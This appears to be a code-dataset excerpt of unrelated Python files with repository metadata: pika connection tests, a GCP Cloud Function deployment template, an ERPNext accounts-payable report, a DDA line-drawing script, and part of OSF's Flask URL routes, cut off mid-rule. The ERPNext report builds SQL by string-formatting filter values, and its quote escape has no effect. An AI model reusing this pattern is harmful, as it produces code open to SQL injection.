def test_blocked_connection_on_stream_terminated_removes_timer(
self, adapter_disconnect_mock, connect_mock, call_later_mock,
remove_timeout_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60),
on_open_error_callback=lambda *args: None)
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
self.assertIsNotNone(conn._blocked_conn_timer)
timer = conn._blocked_conn_timer
conn._on_stream_terminated(exceptions.StreamLostError())
# Check
conn._adapter_remove_timeout.assert_called_once_with(timer)
self.assertIsNone(conn._blocked_conn_timer)
@mock.patch.object(
ConstructibleConnection,
'_adapter_emit_data',
spec_set=connection.Connection._adapter_emit_data)
def test_send_message_updates_frames_sent_and_bytes_sent(
self,
_adapter_emit_data):
self.connection._flush_outbound = mock.Mock()
self.connection._body_max_length = 10000
method = spec.Basic.Publish(
exchange='my-exchange', routing_key='my-route')
props = spec.BasicProperties()
body = b'b' * 1000000
self.connection._send_method(
channel_number=1, method=method, content=(props, body))
frames_sent = _adapter_emit_data.call_count
bytes_sent = sum(
len(call[0][0]) for call in _adapter_emit_data.call_args_list)
self.assertEqual(self.connection.frames_sent, frames_sent)
self.assertEqual(self.connection.bytes_sent, bytes_sent)
def test_no_side_effects_from_message_marshal_error(self):
# Verify that frame buffer is empty on entry
self.assertEqual(b'', self.connection._frame_buffer)
# Use Basic.Public with invalid body to trigger marshalling error
method = spec.Basic.Publish()
properties = spec.BasicProperties()
# Verify that marshalling of method and header won't trigger error
frame.Method(1, method).marshal()
frame.Header(1, body_size=10, props=properties).marshal()
# Create bogus body that should trigger an error during marshalling
body = [1,2,3,4]
# Verify that frame body can be created using the bogus body, but
# that marshalling will fail
frame.Body(1, body)
with self.assertRaises(TypeError):
frame.Body(1, body).marshal()
# Now, attempt to send the method with the bogus body
with self.assertRaises(TypeError):
self.connection._send_method(channel_number=1,
method=method,
content=(properties, body))
# Now make sure that nothing is enqueued on frame buffer
self.assertEqual(b'', self.connection._frame_buffer)
| bsd-3-clause | 6,070,957,001,528,510,000 | 40.98288 | 110 | 0.647197 | false |
aljim/deploymentmanager-samples | community/cloud-foundation/templates/cloud_function/cloud_function.py | 1 | 6561 | # Copyright 2018 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Creates a Cloud Function from a local file system, a Cloud Storage bucket,
or a Cloud Source Repository, and then assigns an HTTPS, Storage, or Pub/Sub
trigger to that Cloud Function.
"""
NO_RESOURCES_OR_OUTPUTS = [], []
def get_source_url_output(function_name):
""" Generates the Cloud Function output with a link to the source archive.
"""
return {
'name': 'sourceArchiveUrl',
'value': '$(ref.{}.sourceArchiveUrl)'.format(function_name)
}
def append_cloud_storage_sources(function, context):
""" Adds source code from the Cloud Storage. """
properties = context.properties
upload_path = properties.get('sourceArchiveUrl')
local_path = properties.get('localUploadPath')
resources = []
outputs = [get_source_url_output(function['name'])]
if local_path:
# The 'upload.py' file must be imported into the YAML file first.
from upload import generate_upload_path, upload_source
upload_path = upload_path or generate_upload_path()
res = upload_source(function, context.imports, local_path, upload_path)
source_resources, source_outputs = res
resources += source_resources
outputs += source_outputs
elif not upload_path:
msg = "Either localUploadPath or sourceArchiveUrl must be provided"
raise Exception(msg)
function['properties']['sourceArchiveUrl'] = upload_path
return resources, outputs
def append_cloud_repository_sources(function, context):
""" Adds the source code from the cloud repository. """
append_optional_property(function,
context.properties,
'sourceRepositoryUrl')
name = function['name']
output = {
'name': 'sourceRepositoryUrl',
'value': '$(ref.{}.sourceRepository.repositoryUrl)'.format(name)
}
return [], [output]
def append_source_code(function, context):
""" Append a reference to the Cloud Function's source code. """
properties = context.properties
if 'sourceArchiveUrl' in properties or 'localUploadPath' in properties:
return append_cloud_storage_sources(function, context)
elif 'sourceRepositoryUrl' in properties:
return append_cloud_repository_sources(function, context)
msg = """At least one of the following properties must be provided:
- sourceRepositoryUrl
- localUploadPath
- sourceArchiveUrl"""
raise ValueError(msg)
def append_trigger_topic(function, properties):
""" Appends the Pub/Sub event trigger. """
topic = properties['triggerTopic']
function['properties']['eventTrigger'] = {
'eventType': 'providers/cloud.pubsub/eventTypes/topic.publish',
'resource': topic
}
return NO_RESOURCES_OR_OUTPUTS
def append_trigger_http(function):
""" Appends the HTTPS trigger and returns the generated URL. """
function['properties']['httpsTrigger'] = {}
output = {
'name': 'httpsTriggerUrl',
'value': '$(ref.{}.httpsTrigger.url)'.format(function['name'])
}
return [], [output]
def append_trigger_storage(function, context):
""" Appends the Storage trigger. """
bucket = context.properties['triggerStorage']['bucketName']
event = context.properties['triggerStorage']['event']
project_id = context.env['project']
function['properties']['eventTrigger'] = {
'eventType': 'google.storage.object.' + event,
'resource': 'projects/{}/buckets/{}'.format(project_id, bucket)
}
return NO_RESOURCES_OR_OUTPUTS
def append_trigger(function, context):
""" Adds the Trigger section and returns all the associated new
resources and outputs.
"""
if 'triggerTopic' in context.properties:
return append_trigger_topic(function, context.properties)
elif 'triggerStorage' in context.properties:
return append_trigger_storage(function, context)
return append_trigger_http(function)
def append_optional_property(function, properties, prop_name):
""" If the property is set, it is added to the function body. """
val = properties.get(prop_name)
if val:
function['properties'][prop_name] = val
return
def create_function_resource(resource_name, context):
""" Creates the Cloud Function resource. """
properties = context.properties
region = properties['region']
function_name = properties.get('name', resource_name)
function = {
'type': 'cloudfunctions.v1beta2.function',
'name': function_name,
'properties':
{
'location': region,
'function': function_name,
},
}
optional_properties = ['entryPoint',
'timeout',
'runtime',
'availableMemoryMb',
'description']
for prop in optional_properties:
append_optional_property(function, properties, prop)
trigger_resources, trigger_outputs = append_trigger(function, context)
code_resources, code_outputs = append_source_code(function, context)
if code_resources:
function['metadata'] = {
'dependsOn': [dep['name'] for dep in code_resources]
}
return (trigger_resources + code_resources + [function],
trigger_outputs + code_outputs + [
{
'name': 'region',
'value': context.properties['region']
},
{
'name': 'name',
'value': '$(ref.{}.name)'.format(function_name)
}
])
def generate_config(context):
""" Entry point for the deployment resources. """
resource_name = context.env['name']
resources, outputs = create_function_resource(resource_name, context)
return {
'resources': resources,
'outputs': outputs
}
| apache-2.0 | 2,122,977,178,188,396,800 | 31.969849 | 81 | 0.636336 | false |
suyashphadtare/test | erpnext/accounts/report/accounts_payable/accounts_payable.py | 1 | 5975 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import getdate, nowdate, flt, cstr
from frappe import msgprint, _
from erpnext.accounts.report.accounts_receivable.accounts_receivable import get_ageing_data
def execute(filters=None):
if not filters: filters = {}
supplier_naming_by = frappe.db.get_value("Buying Settings", None, "supp_master_name")
columns = get_columns(supplier_naming_by)
entries = get_gl_entries(filters)
account_map = dict(((r.name, r) for r in frappe.db.sql("""select acc.name,
supp.supplier_name, supp.name as supplier
from tabAccount acc, tabSupplier supp
where acc.master_type="Supplier" and supp.name=acc.master_name""", as_dict=1)))
entries_after_report_date = [[gle.voucher_type, gle.voucher_no]
for gle in get_gl_entries(filters, before_report_date=False)]
account_supplier_type_map = get_account_supplier_type_map()
voucher_detail_map = get_voucher_details()
# Age of the invoice on this date
age_on = getdate(filters.get("report_date")) > getdate(nowdate()) \
and nowdate() or filters.get("report_date")
data = []
for gle in entries:
if cstr(gle.against_voucher) == gle.voucher_no or not gle.against_voucher \
or [gle.against_voucher_type, gle.against_voucher] in entries_after_report_date \
or (gle.against_voucher_type == "Purchase Order"):
voucher_details = voucher_detail_map.get(gle.voucher_type, {}).get(gle.voucher_no, {})
invoiced_amount = gle.credit > 0 and gle.credit or 0
outstanding_amount = get_outstanding_amount(gle,
filters.get("report_date") or nowdate())
if abs(flt(outstanding_amount)) > 0.01:
paid_amount = invoiced_amount - outstanding_amount
row = [gle.posting_date, gle.account, gle.voucher_type, gle.voucher_no,
voucher_details.get("due_date", ""), voucher_details.get("bill_no", ""),
voucher_details.get("bill_date", ""), invoiced_amount,
paid_amount, outstanding_amount]
# Ageing
if filters.get("ageing_based_on") == "Due Date":
ageing_based_on_date = voucher_details.get("due_date", "")
else:
ageing_based_on_date = gle.posting_date
row += get_ageing_data(age_on, ageing_based_on_date, outstanding_amount) + \
[account_map.get(gle.account, {}).get("supplier") or ""]
if supplier_naming_by == "Naming Series":
row += [account_map.get(gle.account, {}).get("supplier_name") or ""]
row += [account_supplier_type_map.get(gle.account), gle.remarks]
data.append(row)
for i in range(0, len(data)):
data[i].insert(4, """<a href="%s"><i class="icon icon-share" style="cursor: pointer;"></i></a>""" \
% ("/".join(["#Form", data[i][2], data[i][3]]),))
return columns, data
def get_columns(supplier_naming_by):
columns = [
_("Posting Date") + ":Date:80", _("Account") + ":Link/Account:150", _("Voucher Type") + "::110",
_("Voucher No") + "::120", "::30", _("Due Date") + ":Date:80", _("Bill No") + "::80", _("Bill Date") + ":Date:80",
_("Invoiced Amount") + ":Currency:100", _("Paid Amount") + ":Currency:100",
_("Outstanding Amount") + ":Currency:100", _("Age") + ":Int:50", "0-30:Currency:100",
"30-60:Currency:100", "60-90:Currency:100", _("90-Above") + ":Currency:100",
_("Supplier") + ":Link/Supplier:150"
]
if supplier_naming_by == "Naming Series":
columns += ["Supplier Name::110"]
columns += ["Supplier Type:Link/Supplier Type:120", "Remarks::150"]
return columns
def get_gl_entries(filters, before_report_date=True):
conditions, supplier_accounts = get_conditions(filters, before_report_date)
gl_entries = []
gl_entries = frappe.db.sql("""select * from tabGL_Entry
where docstatus < 2 %s order by posting_date, account""" %
(conditions), tuple(supplier_accounts), as_dict=1)
return gl_entries
def get_conditions(filters, before_report_date=True):
conditions = ""
if filters.get("company"):
conditions += " and company='%s'" % filters["company"].replace("'", "\'")
supplier_accounts = []
if filters.get("account"):
supplier_accounts = [filters["account"]]
else:
supplier_accounts = frappe.db.sql_list("""select name from tabAccount
where ifnull(master_type, '') = 'Supplier' and docstatus < 2 %s""" %
conditions, filters)
if supplier_accounts:
conditions += " and account in (%s)" % (", ".join(['%s']*len(supplier_accounts)))
else:
msgprint(_("No Supplier Accounts found. Supplier Accounts are identified based on 'Master Type' value in account record."), raise_exception=1)
if filters.get("report_date"):
if before_report_date:
conditions += " and posting_date<='%s'" % filters["report_date"]
else:
conditions += " and posting_date>'%s'" % filters["report_date"]
return conditions, supplier_accounts
def get_account_supplier_type_map():
account_supplier_type_map = {}
for each in frappe.db.sql("""select acc.name, supp.supplier_type from tabSupplier supp,
tabAccount acc where supp.name = acc.master_name group by acc.name"""):
account_supplier_type_map[each[0]] = each[1]
return account_supplier_type_map
def get_voucher_details():
voucher_details = {}
for dt in ["Purchase Invoice", "Journal Voucher"]:
voucher_details.setdefault(dt, frappe._dict())
for t in frappe.db.sql("""select name, due_date, bill_no, bill_date
from `tab%s`""" % dt, as_dict=1):
voucher_details[dt].setdefault(t.name, t)
return voucher_details
def get_outstanding_amount(gle, report_date):
payment_amount = frappe.db.sql("""
select sum(ifnull(debit, 0)) - sum(ifnull(credit, 0))
from tabGL_Entry
where account = %s and posting_date <= %s and against_voucher_type = %s
and against_voucher = %s and name != %s""",
(gle.account, report_date, gle.voucher_type, gle.voucher_no, gle.name))[0][0]
outstanding_amount = flt(gle.credit) - flt(gle.debit) - flt(payment_amount)
return outstanding_amount
| agpl-3.0 | -4,593,431,470,045,977,000 | 39.646259 | 144 | 0.671967 | false |
dobbinx3/pythonScripts | digital_differential_analyzer.py | 1 | 1758 | import sys
import math
print("Welcome to the DDA's algorithm.")
print("\nLet's begin setting the size of the matrix.\n")
columns = int(input("How many columns does the matrix have?\n"))
lines = int(input("How many lines does the matrix have?\n"))
print("\nNow let's set the coordinates of two points, so we can draw a line.\n")
# Create a n*m matrix
matrix = [["." for x in range(columns)] for x in range(lines)]
# Function that turn on the point in the matrix
def connectPoints(x, y):
# By default we round up the number
# If you want to round down uncomment the math.floor() methods, and comment the math.ceil() methods
# Remember that, this algorithm isn't very smart, so do not use the math.round() method
x = math.ceil(x)
y = math.ceil(y)
# x = math.floor(x)
# y = math.floor(y)
matrix[lines - 1 - y][x] = "X"
# First point
x1 = int(input("Type the 'x' coordinate for the first point\n"))
y1 = int(input("Type the 'y' coordinate for the first point\n"))
# Second point
x2 = int(input("Type the 'x' coordinate for the second point\n"))
y2 = int(input("Type the 'y' coordinate for the second point\n"))
# Absolute value for x and y
xAbsValue = abs(x2 - x1)
yAbsValue = abs(y2 - y1)
# Create size variable
if xAbsValue >= yAbsValue:
size = xAbsValue
else:
size = yAbsValue
# Create delta x and delta y
# Verify with the size is less than zero
if size > 0:
deltaX = xAbsValue/size
deltaY = yAbsValue/size
else:
print("\n please, write two distinct points.")
sys.exit(0)
# Init the count and informations for while loop
i = 0
x = x1
y = y1
while i <= size:
connectPoints(x, y)
x = x + deltaX
y = y + deltaY
i += 1
print("\n")
for row in matrix:
print(" ".join(row))
| mit | -3,734,755,985,305,867,300 | 24.852941 | 103 | 0.661547 | false |
zachjanicki/osf.io | website/routes.py | 1 | 51186 | # -*- coding: utf-8 -*-
import os
import httplib as http
from flask import request
from flask import send_from_directory
from framework import status
from framework import sentry
from framework.auth import cas
from framework.routing import Rule
from framework.flask import redirect
from framework.routing import WebRenderer
from framework.exceptions import HTTPError
from framework.auth import get_display_name
from framework.routing import xml_renderer
from framework.routing import json_renderer
from framework.routing import process_rules
from framework.auth import views as auth_views
from framework.routing import render_mako_string
from framework.auth.core import _get_current_user
from modularodm import Q
from modularodm.exceptions import QueryException, NoResultsFound
from website import util
from website import prereg
from website import settings
from website import language
from website.util import metrics
from website.util import paths
from website.util import sanitize
from website.models import Institution
from website import landing_pages as landing_page_views
from website import views as website_views
from website.citations import views as citation_views
from website.search import views as search_views
from website.oauth import views as oauth_views
from website.profile import views as profile_views
from website.project import views as project_views
from website.addons.base import views as addon_views
from website.discovery import views as discovery_views
from website.conferences import views as conference_views
from website.preprints import views as preprint_views
from website.institutions import views as institution_views
from website.notifications import views as notification_views
def get_globals():
"""Context variables that are available for every template rendered by
OSFWebRenderer.
"""
user = _get_current_user()
if request.host_url != settings.DOMAIN:
try:
inst_id = (Institution.find_one(Q('domains', 'eq', request.host.lower())))._id
login_url = '{}institutions/{}'.format(settings.DOMAIN, inst_id)
except NoResultsFound:
login_url = request.url.replace(request.host_url, settings.DOMAIN)
else:
login_url = request.url
return {
'private_link_anonymous': is_private_link_anonymous_view(),
'user_name': user.username if user else '',
'user_full_name': user.fullname if user else '',
'user_id': user._primary_key if user else '',
'user_locale': user.locale if user and user.locale else '',
'user_timezone': user.timezone if user and user.timezone else '',
'user_url': user.url if user else '',
'user_gravatar': profile_views.current_user_gravatar(size=25)['gravatar_url'] if user else '',
'user_api_url': user.api_url if user else '',
'user_entry_point': metrics.get_entry_point(user) if user else '',
'display_name': get_display_name(user.fullname) if user else '',
'use_cdn': settings.USE_CDN_FOR_CLIENT_LIBS,
'piwik_host': settings.PIWIK_HOST,
'piwik_site_id': settings.PIWIK_SITE_ID,
'sentry_dsn_js': settings.SENTRY_DSN_JS if sentry.enabled else None,
'dev_mode': settings.DEV_MODE,
'allow_login': settings.ALLOW_LOGIN,
'cookie_name': settings.COOKIE_NAME,
'status': status.pop_status_messages(),
'domain': settings.DOMAIN,
'api_domain': settings.API_DOMAIN,
'disk_saving_mode': settings.DISK_SAVING_MODE,
'language': language,
'noteworthy_links_node': settings.NEW_AND_NOTEWORTHY_LINKS_NODE,
'popular_links_node': settings.POPULAR_LINKS_NODE,
'web_url_for': util.web_url_for,
'api_url_for': util.api_url_for,
'api_v2_url': util.api_v2_url, # URL function for templates
'api_v2_base': util.api_v2_url(''), # Base url used by JS api helper
'sanitize': sanitize,
'sjson': lambda s: sanitize.safe_json(s),
'webpack_asset': paths.webpack_asset,
'waterbutler_url': settings.WATERBUTLER_URL,
'login_url': cas.get_login_url(login_url, auto=True),
'reauth_url': util.web_url_for('auth_logout', redirect_url=request.url, reauth=True),
'profile_url': cas.get_profile_url(),
'enable_institutions': settings.ENABLE_INSTITUTIONS,
'keen_project_id': settings.KEEN_PROJECT_ID,
'keen_write_key': settings.KEEN_WRITE_KEY,
}
def is_private_link_anonymous_view():
try:
# Avoid circular import
from website.project.model import PrivateLink
return PrivateLink.find_one(
Q('key', 'eq', request.args.get('view_only'))
).anonymous
except QueryException:
return False
class OsfWebRenderer(WebRenderer):
"""Render a Mako template with OSF context vars.
:param trust: Optional. If ``False``, markup-safe escaping will be enabled
"""
def __init__(self, *args, **kwargs):
kwargs['data'] = get_globals
super(OsfWebRenderer, self).__init__(*args, **kwargs)
#: Use if a view only redirects or raises error
notemplate = OsfWebRenderer('', renderer=render_mako_string, trust=False)
# Static files (robots.txt, etc.)
def favicon():
return send_from_directory(
settings.STATIC_FOLDER,
'favicon.ico',
mimetype='image/vnd.microsoft.icon'
)
def robots():
"""Serves the robots.txt file."""
# Allow local robots.txt
if os.path.exists(os.path.join(settings.STATIC_FOLDER,
'robots.local.txt')):
robots_file = 'robots.local.txt'
else:
robots_file = 'robots.txt'
return send_from_directory(
settings.STATIC_FOLDER,
robots_file,
mimetype='text/plain'
)
def goodbye():
# Redirect to dashboard if logged in
if _get_current_user():
return redirect(util.web_url_for('index'))
status.push_status_message(language.LOGOUT, kind='success', trust=False)
return {}
def make_url_map(app):
"""Set up all the routes for the OSF app.
:param app: A Flask/Werkzeug app to bind the rules to.
"""
# Set default views to 404, using URL-appropriate renderers
process_rules(app, [
Rule(
'/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
OsfWebRenderer('', render_mako_string, trust=False)
),
Rule(
'/api/v1/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
json_renderer
),
])
### GUID ###
process_rules(app, [
Rule(
[
'/<guid>/',
'/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
notemplate,
),
Rule(
[
'/api/v1/<guid>/',
'/api/v1/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
json_renderer,
),
])
# Static files
process_rules(app, [
Rule('/favicon.ico', 'get', favicon, json_renderer),
Rule('/robots.txt', 'get', robots, json_renderer),
])
### Base ###
process_rules(app, [
Rule(
'/dashboard/',
'get',
website_views.redirect_to_home,
OsfWebRenderer('home.mako', trust=False)
),
Rule(
'/myprojects/',
'get',
website_views.dashboard,
OsfWebRenderer('dashboard.mako', trust=False)
),
Rule(
'/reproducibility/',
'get',
website_views.reproducibility,
notemplate
),
Rule('/about/', 'get', website_views.redirect_about, notemplate),
Rule('/faq/', 'get', {}, OsfWebRenderer('public/pages/faq.mako', trust=False)),
Rule(['/getting-started/', '/getting-started/email/', '/howosfworks/'], 'get', website_views.redirect_getting_started, notemplate),
Rule('/support/', 'get', {}, OsfWebRenderer('public/pages/support.mako', trust=False)),
Rule(
'/explore/',
'get',
{},
OsfWebRenderer('public/explore.mako', trust=False)
),
Rule(
[
'/messages/',
'/help/'
],
'get',
{},
OsfWebRenderer('public/comingsoon.mako', trust=False)
),
Rule(
'/view/<meeting>/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting.mako', trust=False),
),
Rule(
'/view/<meeting>/plain/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting_plain.mako', trust=False),
endpoint_suffix='__plain',
),
Rule(
'/api/v1/view/<meeting>/',
'get',
conference_views.conference_data,
json_renderer,
),
Rule(
'/meetings/',
'get',
conference_views.conference_view,
OsfWebRenderer('public/pages/meeting_landing.mako', trust=False),
),
Rule(
'/api/v1/meetings/submissions/',
'get',
conference_views.conference_submissions,
json_renderer,
),
Rule(
'/presentations/',
'get',
conference_views.redirect_to_meetings,
json_renderer,
),
Rule(
'/news/',
'get',
{},
OsfWebRenderer('public/pages/news.mako', trust=False)
),
Rule(
'/prereg/',
'get',
prereg.prereg_landing_page,
OsfWebRenderer('prereg_landing_page.mako', trust=False)
),
Rule(
'/preprints/',
'get',
preprint_views.preprint_landing_page,
OsfWebRenderer('public/pages/preprint_landing.mako', trust=False),
),
Rule(
'/preprint/',
'get',
preprint_views.preprint_redirect,
notemplate,
),
Rule(
'/api/v1/prereg/draft_registrations/',
'get',
prereg.prereg_draft_registrations,
json_renderer,
),
])
# Site-wide API routes
process_rules(app, [
Rule(
'/citations/styles/',
'get',
citation_views.list_citation_styles,
json_renderer,
),
], prefix='/api/v1')
process_rules(app, [
Rule(
[
'/project/<pid>/<addon>/settings/disable/',
'/project/<pid>/node/<nid>/<addon>/settings/disable/',
],
'post',
addon_views.disable_addon,
json_renderer,
),
Rule(
'/profile/<uid>/<addon>/settings/',
'get',
addon_views.get_addon_user_config,
json_renderer,
),
], prefix='/api/v1')
# OAuth
process_rules(app, [
Rule(
'/oauth/connect/<service_name>/',
'get',
oauth_views.oauth_connect,
json_renderer,
),
Rule(
'/oauth/callback/<service_name>/',
'get',
oauth_views.oauth_callback,
OsfWebRenderer('util/oauth_complete.mako', trust=False),
),
])
process_rules(app, [
Rule(
[
'/oauth/accounts/<external_account_id>/',
],
'delete',
oauth_views.oauth_disconnect,
json_renderer,
)
], prefix='/api/v1')
### Metadata ###
process_rules(app, [
Rule(
[
'/project/<pid>/comments/timestamps/',
'/project/<pid>/node/<nid>/comments/timestamps/',
],
'put',
project_views.comment.update_comments_timestamp,
json_renderer,
),
Rule(
[
'/project/<pid>/citation/',
'/project/<pid>/node/<nid>/citation/',
],
'get',
citation_views.node_citation,
json_renderer,
),
], prefix='/api/v1')
### Forms ###
process_rules(app, [
Rule('/forms/registration/', 'get', website_views.registration_form, json_renderer),
Rule('/forms/signin/', 'get', website_views.signin_form, json_renderer),
Rule('/forms/forgot_password/', 'get', website_views.forgot_password_form, json_renderer),
Rule('/forms/reset_password/', 'get', website_views.reset_password_form, json_renderer),
], prefix='/api/v1')
### Discovery ###
process_rules(app, [
Rule(
'/explore/activity/',
'get',
discovery_views.activity,
OsfWebRenderer('public/pages/active_nodes.mako', trust=False)
),
])
### Auth ###
# Web
process_rules(app, [
Rule(
'/confirm/<uid>/<token>/',
'get',
auth_views.confirm_email_get,
# View will either redirect or display error message
notemplate
),
Rule(
'/resetpassword/<verification_key>/',
['get', 'post'],
auth_views.reset_password,
OsfWebRenderer('public/resetpassword.mako', render_mako_string, trust=False)
),
# Resend confirmation URL linked to in CAS login page
Rule(
'/resend/',
['get', 'post'],
auth_views.resend_confirmation,
OsfWebRenderer('resend.mako', render_mako_string, trust=False)
),
# TODO: Remove `auth_register_post`
Rule(
'/register/',
'post',
auth_views.auth_register_post,
OsfWebRenderer('public/login.mako', trust=False)
),
Rule('/api/v1/register/', 'post', auth_views.register_user, json_renderer),
Rule(
[
'/login/',
'/account/'
],
'get',
auth_views.auth_login,
OsfWebRenderer('public/login.mako', trust=False)
),
Rule(
'/login/first/',
'get',
auth_views.auth_login,
OsfWebRenderer('public/login.mako', trust=False),
endpoint_suffix='__first', view_kwargs={'first': True}
),
Rule(
'/logout/',
'get',
auth_views.auth_logout,
notemplate
),
Rule(
'/forgotpassword/',
'get',
auth_views.forgot_password_get,
OsfWebRenderer('public/forgot_password.mako', trust=False)
),
Rule(
'/forgotpassword/',
'post',
auth_views.forgot_password_post,
OsfWebRenderer('public/login.mako', trust=False)
),
Rule(
[
'/midas/',
'/summit/',
'/accountbeta/',
'/decline/'
],
'get',
auth_views.auth_registerbeta,
notemplate
),
# FIXME or REDIRECTME: This redirects to settings when logged in, but gives an error (no template) when logged out
Rule(
'/login/connected_tools/',
'get',
landing_page_views.connected_tools,
OsfWebRenderer('public/login_landing.mako', trust=False)
),
# FIXME or REDIRECTME: mod-meta error when logged out: signin form not rendering for login_landing sidebar
Rule(
'/login/enriched_profile/',
'get',
landing_page_views.enriched_profile,
OsfWebRenderer('public/login_landing.mako', trust=False)
),
])
### Profile ###
# Web
process_rules(app, [
Rule(
'/profile/',
'get',
profile_views.profile_view,
OsfWebRenderer('profile.mako', trust=False)
),
Rule(
'/profile/<uid>/',
'get',
profile_views.profile_view_id,
OsfWebRenderer('profile.mako', trust=False)
),
Rule(
['/user/merge/'],
'get',
auth_views.merge_user_get,
OsfWebRenderer('merge_accounts.mako', trust=False)
),
Rule(
['/user/merge/'],
'post',
auth_views.merge_user_post,
OsfWebRenderer('merge_accounts.mako', trust=False)
),
# Route for claiming and setting email and password.
# Verification token must be querystring argument
Rule(
['/user/<uid>/<pid>/claim/'],
['get', 'post'],
project_views.contributor.claim_user_form,
OsfWebRenderer('claim_account.mako', trust=False)
),
Rule(
['/user/<uid>/<pid>/claim/verify/<token>/'],
['get', 'post'],
project_views.contributor.claim_user_registered,
OsfWebRenderer('claim_account_registered.mako', trust=False)
),
Rule(
'/settings/',
'get',
profile_views.user_profile,
OsfWebRenderer('profile/settings.mako', trust=False),
),
Rule(
'/settings/account/',
'get',
profile_views.user_account,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/account/password',
'post',
profile_views.user_account_password,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/addons/',
'get',
profile_views.user_addons,
OsfWebRenderer('profile/addons.mako', trust=False),
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
OsfWebRenderer('profile/notifications.mako', trust=False),
),
Rule(
'/settings/applications/',
'get',
profile_views.oauth_application_list,
OsfWebRenderer('profile/oauth_app_list.mako', trust=False)
),
Rule(
'/settings/applications/create/',
'get',
profile_views.oauth_application_register,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/applications/<client_id>/',
'get',
profile_views.oauth_application_detail,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/tokens/',
'get',
profile_views.personal_access_token_list,
OsfWebRenderer('profile/personal_tokens_list.mako', trust=False)
),
Rule(
'/settings/tokens/create/',
'get',
profile_views.personal_access_token_register,
OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
),
Rule(
'/settings/tokens/<_id>/',
'get',
profile_views.personal_access_token_detail,
OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
),
# TODO: Uncomment once outstanding issues with this feature are addressed
# Rule(
# '/@<twitter_handle>/',
# 'get',
# profile_views.redirect_to_twitter,
# OsfWebRenderer('error.mako', render_mako_string, trust=False)
# ),
])
# API
process_rules(app, [
Rule('/profile/', 'get', profile_views.profile_view, json_renderer),
Rule('/profile/', 'put', profile_views.update_user, json_renderer),
Rule('/resend/', 'put', profile_views.resend_confirmation, json_renderer),
Rule('/profile/<uid>/', 'get', profile_views.profile_view_id, json_renderer),
# Used by profile.html
Rule('/profile/<uid>/edit/', 'post', profile_views.edit_profile, json_renderer),
Rule('/profile/<uid>/public_projects/', 'get',
profile_views.get_public_projects, json_renderer),
Rule('/profile/<uid>/public_components/', 'get',
profile_views.get_public_components, json_renderer),
Rule('/profile/<user_id>/summary/', 'get',
profile_views.get_profile_summary, json_renderer),
Rule('/user/<uid>/<pid>/claim/email/', 'post',
project_views.contributor.claim_user_post, json_renderer),
Rule(
'/profile/export/',
'post',
profile_views.request_export,
json_renderer,
),
Rule(
'/profile/deactivate/',
'post',
profile_views.request_deactivation,
json_renderer,
),
Rule(
[
'/profile/gravatar/',
'/users/gravatar/',
'/profile/gravatar/<size>',
'/users/gravatar/<size>',
],
'get',
profile_views.current_user_gravatar,
json_renderer,
),
Rule(
[
'/profile/<uid>/gravatar/',
'/users/<uid>/gravatar/',
'/profile/<uid>/gravatar/<size>',
'/users/<uid>/gravatar/<size>',
],
'get',
profile_views.get_gravatar,
json_renderer,
),
# Rules for user profile configuration
Rule('/settings/names/', 'get', profile_views.serialize_names, json_renderer),
Rule('/settings/names/', 'put', profile_views.unserialize_names, json_renderer),
Rule('/settings/names/impute/', 'get', profile_views.impute_names, json_renderer),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'get',
profile_views.serialize_social,
json_renderer,
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'get',
profile_views.serialize_jobs,
json_renderer,
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'get',
profile_views.serialize_schools,
json_renderer,
),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'put',
profile_views.unserialize_social,
json_renderer
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'put',
profile_views.unserialize_jobs,
json_renderer
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'put',
profile_views.unserialize_schools,
json_renderer
),
], prefix='/api/v1',)
### Search ###
# Web
process_rules(app, [
Rule(
'/search/',
'get',
{},
OsfWebRenderer('search.mako', trust=False)
),
Rule(
'/share/',
'get',
{},
OsfWebRenderer('share_search.mako', trust=False)
),
Rule(
'/share/registration/',
'get',
{'register': settings.SHARE_REGISTRATION_URL},
OsfWebRenderer('share_registration.mako', trust=False)
),
Rule(
'/share/help/',
'get',
{'help': settings.SHARE_API_DOCS_URL},
OsfWebRenderer('share_api_docs.mako', trust=False)
),
Rule( # FIXME: Dead route; possible that template never existed; confirm deletion candidate with ErinB
'/share_dashboard/',
'get',
{},
OsfWebRenderer('share_dashboard.mako', trust=False)
),
Rule(
'/share/atom/',
'get',
search_views.search_share_atom,
xml_renderer
),
Rule('/api/v1/user/search/', 'get', search_views.search_contributor, json_renderer),
Rule(
'/api/v1/search/node/',
'post',
project_views.node.search_node,
